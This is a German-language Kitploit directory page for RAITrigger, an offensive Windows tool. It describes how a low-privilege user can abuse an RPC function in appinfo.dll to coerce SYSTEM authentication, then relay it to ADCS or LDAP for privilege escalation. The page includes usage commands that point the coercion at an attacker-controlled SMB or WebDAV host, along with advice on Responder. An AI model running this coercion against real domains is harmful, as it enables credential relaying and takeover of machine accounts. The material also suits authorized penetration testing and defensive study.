Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
RAITrigger — Lokaler SYSTEM-Auth-Trigger zum Relaying | Kitploit
Tools/GitHubGitHub/rteccybersec/raitrigger
Privilege EscalationExploitationLaterale BewegungAuthentifizierungRed Teaming
GitHubrteccybersec/raitrigger

RAITrigger

Lokaler SYSTEM-Auth-Trigger zum Relaying

Repository anzeigen
173251vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

RAITrigger

Die RPC-Funktion RAiForceElevationPromptForCOM aus der Bibliothek appinfo.dll ermöglicht SYSTEM-Zwang. Dies funktioniert nur auf der Domäne beigetretenen Systemen. Es hat sich herausgestellt, dass diese Funktion von jedem Benutzer mit niedrigen Berechtigungen aufgerufen werden kann (nicht um einen Prozess zu starten), sondern um SYSTEM-Authentifizierung an einem beliebigen Ort auszulösen. Dies liegt daran, dass CreateFileW als SYSTEM zum Speicherort des ersten Eingabeparameters aufgerufen wird:



Da der Benutzer mit niedrigen Berechtigungen immer noch impersoniert wird, kann dies nicht als Potato-Trigger verwendet werden, um Berechtigungen von SEImpersonate auf SYSTEM zu erhöhen:



Aber es kann verwendet werden, um ein Computerkonto-Zertifikat gegen ADCS anzufordern, wenn die Web-Registrierung mit der eingehenden SMB-Authentifizierung aktiviert ist. Oder es kann für LPE verwendet werden, indem es an LDAP weitergeleitet wird – wenn LDAP Signing nicht aktiviert ist.

So lösen Sie die SMB-Authentifizierung aus:

root@kitploit:~
[*] RAITrigger.exe \\attackerip\test\test.exe

So lösen Sie die HTTP-Authentifizierung aus (der WebClient-Dienst muss aktiviert sein):

root@kitploit:~
[*] RAITrigger.exe \\hostname@80\test\test.exe

Die HTTP-Authentifizierung wird nur an Systeme in vertrauenswürdigen Intranet-Zonen ausgelöst. Daher müssen Sie einen ADIDNS-Eintrag für Ihre Kali-IP erstellen oder sich im selben Subnetz befinden und z. B. Responder verwenden. Verwenden Sie niemals den vollständigen FQDN, sondern nur den Hostnamen.

Das Aufrufen dieser Funktion aus der Ferne (selbst mit lokalen Administratorrechten) führt zu rpc_access_denied, daher ist dies keine Alternative zu z. B. PetitPotam oder ähnlichen:



Verbesserungspotenzial

  • Die NtApiDotNet-Bibliothek ist riesig. Die Verwendung von MIDL-Bytes kann die Assembly-Größe drastisch reduzieren, ähnlich wie bei SharpSystemTriggers

Quellen

  • https://github.com/warpnet/MS-RPC-Fuzzer
Tool herunterladen